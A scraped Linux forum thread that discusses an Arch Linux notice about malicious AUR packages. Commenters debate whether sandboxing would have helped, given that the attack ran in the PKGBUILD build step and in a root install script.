Nemeski@mander.xyz to Linux@programming.dev · 2 days agoActive AUR malicious packages incidentarchlinux.orgexternal-linkmessage-square27fedilinkarrow-up1104arrow-down10
arrow-up1104arrow-down1external-linkActive AUR malicious packages incidentarchlinux.orgNemeski@mander.xyz to Linux@programming.dev · 2 days agomessage-square27fedilink
minus-squareEquinox1289@sh.itjust.workslinkfedilinkarrow-up8arrow-down2·2 days agoThis is why I prefer Flatpaks, or really any application sandboxing.
minus-squareOoops@feddit.orglinkfedilinkarrow-up7·1 day agoPeople not even checking the PKGBUILDs will also not check sandboxed applications to see if it was actually done properly…
minus-square9tr6gyp3@lemmy.worldlinkfedilinkEnglisharrow-up6·1 day agoAUR packages can be sandboxed with many different solutions. Any pckage can be sandboxed really.
minus-squareDefault Username@lemmy.dbzer0.comlinkfedilinkEnglisharrow-up9·edit-21 day agoThis attack was executed by a script running in the PKGBUILD itself. You didn’t have to run the application to be infected since just building it will infect your machine.
minus-squarepatlefort@lemmy.worldlinkfedilinkarrow-up2·22 hours agoIt also had an install script that will be run as root when the package is installed. Can’t sandbox that.
minus-square9tr6gyp3@lemmy.worldlinkfedilinkEnglisharrow-up3·1 day agoYeah, I bet the build process could also be sandboxed, but Im sure its not the default.
minus-squareDefault Username@lemmy.dbzer0.comlinkfedilinkEnglisharrow-up4·1 day agoSandboxing the build process would be a process. Nix already does it, for example. Many AUR packages don’t include a full list of dependencies.
This is why I prefer Flatpaks, or really any application sandboxing.
People not even checking the PKGBUILDs will also not check sandboxed applications to see if it was actually done properly…
AUR packages can be sandboxed with many different solutions. Any pckage can be sandboxed really.
This attack was executed by a script running in the PKGBUILD itself. You didn’t have to run the application to be infected since just building it will infect your machine.
It also had an install script that will be run as root when the package is installed. Can’t sandbox that.
Yeah, I bet the build process could also be sandboxed, but Im sure its not the default.
Sandboxing the build process would be a process. Nix already does it, for example. Many AUR packages don’t include a full list of dependencies.